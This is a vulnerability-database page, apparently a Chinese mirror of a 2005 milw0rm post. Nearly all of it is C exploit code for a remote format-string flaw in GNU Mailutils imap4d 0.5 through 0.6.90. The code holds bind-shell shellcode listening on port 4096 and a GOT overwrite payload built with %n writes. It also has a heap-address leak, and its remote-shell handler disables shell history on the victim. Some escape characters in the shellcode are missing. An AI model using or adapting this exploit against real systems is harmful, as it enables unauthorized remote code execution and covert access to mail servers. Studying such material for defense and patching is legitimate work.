GNU Mailutils imap4d 0.5 < 0.6.90 – Remote Format String
漏洞ID | 1055161 | 漏洞类型 | |
发布时间 | 2005-06-10 | 更新时间 | 2005-06-10 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
gun-imapd.c
"""""""""""
gnu mailutils-0.5 - < mailutils-0.6.90 remote formatstring exploit
written and tested on FC3.
this is a first testing version and the onlyone to go public.
by
[email protected]
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
// to be modified
#define GOT 0x080573fc
static char bindshell[]= //by pr1 bind to :4096
"x31xc0" // xor %eax,%eax
"x50" // push %eax
"x40" // inc %eax
"x89xc3" // mov %eax,%ebx
"x40" // inc %eax
"x53" // push %ebx
"x50" // push %eax
"x89xe1" // mov %esp,%ecx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"x31xd2" // xor %edx,%edx
"x52" // push %edx
"x43" // inc %ebx
"x6ax10" // push $0x10
"x66x53" // push %bx
"x89xe1" // mov %esp,%ecx
"x6ax10" // push $0x10
"x51" // push %ecx
"x50" // push %eax
"x89xe1" // mov %esp,%ecx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"xd1xe3" // shl %ebx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"x58" // pop %eax
"x52" // push %edx
"x50" // push %eax
"x43" // inc %ebx
"x89xe1" // mov %esp,%ecx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"x87xd9" // xchg %ebx,%ecx
"x93" // xchg %eax,%ebx
"x49" // dec %ecx
"x31xc0" // xor %eax,%eax
"x49" // dec %ecx
"xb0x3f" // mov $0x3f,%al
"xcdx80" // int $0x80
"x41" // inc %ecx
"xe2xf8" // loop 8048469 <blah>
"x52" // push %edx
"x68x6ex2fx73x68" // push $0x68732f6e
"x68x2fx2fx62x69" // push $0x69622f2f
"x89xe3" // mov %esp,%ebx
"x52" // push %edx
"x53" // push %ebx
"x89xe1" // mov %esp,%ecx
"xb0x0b" // mov $0xb,%al
"xcdx80" // int $0x80
;
/********************************
|****** handle remoteshell ******|
********************************/
int handleshell(int peersh)
{
fd_set fds;
char buff[2048];
int ret, cntr = 1;
printf(" |- enjoy your stay and come back soon ;>n");
write(peersh, "unset HISTFILE;id;uname -a;n", 30);
while(ret && cntr)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(peersh, &fds);
ret = select(peersh+1, &fds, 0, 0, 0);
if(ret)
{
memset(buff, 0x0, sizeof(buff));
if(FD_ISSET(peersh, &fds))
{
cntr = read(peersh, buff, sizeof(buff)-1);
printf("%s", buff);
fflush(stdout);
}
if(FD_ISSET(0, &fds))
{
cntr = read(0, buff, sizeof(buff)-1);
write(peersh, buff, strlen(buff));
}
}
}
return 1;
}
/********************************
|********* HELP OUTPUT **********|
********************************/
void help()
{
printf(" `- usage: gun-imapd -p 143 -t www.exploits.cx n");
exit(0);
}
/********************************
|******* CONNECT FUNC **********|
********************************/
int connectme(char* ip, unsigned short port)
{
int soquet;
struct sockaddr_in remoteaddr_in;
struct hostent* hostip;
memset(&remoteaddr_in, 0x0, sizeof(remoteaddr_in));
if ((hostip = gethostbyname(ip)) == NULL)
{
printf(" |- could not resolve [%s]n", ip);
exit(-1);
}
remoteaddr_in.sin_family = AF_INET;
remoteaddr_in.sin_port = htons(port);
remoteaddr_in.sin_addr = *((struct in_addr *)hostip->h_addr);
if ((soquet = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf(" |- got no socket!n");
exit(-1);
}
printf(" |- try connecting to [%s:%d] ...", ip, port);
if (connect(soquet, (struct sockaddr *)&remoteaddr_in, sizeof(struct sockaddr)) == -1)
{
printf(" no connection, exiting!n");
exit(-1);
}
printf(" successfull!n");
return(soquet);
}
/********************************
|********* DO SPLOIT ************|
********************************/
int do_sploit(int soquet)
{
char buff[1024], *addr = 0;
int cntr = 0, *ptr, scaddr, gotaddr = GOT;
unsigned int w1, w2 ,w3;
//find heap with our shellcode: !experimental!
memset(buff, 0x00, sizeof(buff));
memset(buff, 0x41, 496);
strcat(buff, "111122223333%p%p%p%p[%p-%p]rn");
if(write(soquet, buff, strlen(buff)) == -1)
{
printf(" |- could not send packet!n");
return -1;
}
memset(buff, 0x00, sizeof(buff));
read(soquet, buff, sizeof(buff)-1);
addr = strstr(buff, "[");
if(addr > 0)
{
scaddr = strtoul(++addr, 0, 0) + 0x330;//the next chunk..
printf(" |- using %pn", scaddr);
}
else printf(" |- !could not determine heap address..n!");
//k build exploit now:
w3 = ( scaddr & 0xffff0000 ) >> 16;
w1 = ( scaddr & 0x0000ffff );
memset(buff, 0x00, sizeof(buff));
memset(buff, 0x41, 496);
memcpy(buff+400, bindshell, strlen(bindshell));
cntr = strlen(buff) + 3*4;
ptr = (int *)gotaddr;
memcpy((buff+496), &ptr,4);
ptr = (int *)gotaddr;
memcpy((buff+500), &ptr,4);
ptr = (int *)(gotaddr+2);
memcpy((buff+504), &ptr,4);
w1 -= cntr;
w3 += (0x10000 - w1) - cntr;
sprintf(buff+508, "%%%dp%%n%%%dp%%n rn", w1, w3);
if(write(soquet, buff, strlen(buff)) == -1)
{
printf(" |- could not send packet!n");
return -1;
}
//memset(buff, 0x00, sizeof(buff));
//read(soquet, buff, sizeof(buff));
return 1;
}
/********************************
|************* MAIN *************|
********************************/
int main(int argc, char *argv[])
{
int tmp, socke, port = 143;
char *target = 0;
char banner[32];
printf(" . gun-imapd v0.1 by qobaiashin |n");
memset(banner, 0x00, sizeof(banner));
while((tmp = getopt(argc, argv, "p:t:h")) != EOF)
{
switch (tmp)
{
case 'p':
port = atoi(optarg);
printf(" |- using port: %dn", port);
break;
case 't':
target = optarg;
printf(" |- target host is: %sn", optarg);
break;
case 'h': help();
}
}
if (target == NULL) help();
socke = connectme(target, port);
if (read(socke, banner, sizeof(banner)) > -1)
{
printf(" |- remote host is a %s", (banner+4));
}
do_sploit(socke);
sleep(1);
tmp = connectme(target, 4096);
handleshell(tmp);
close(tmp);
close(socke);
}
// milw0rm.com [2005-06-10]
相关推荐: Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability
Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability 漏洞ID 1097396 漏洞类型 Input Validation Error 发布时间 2…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666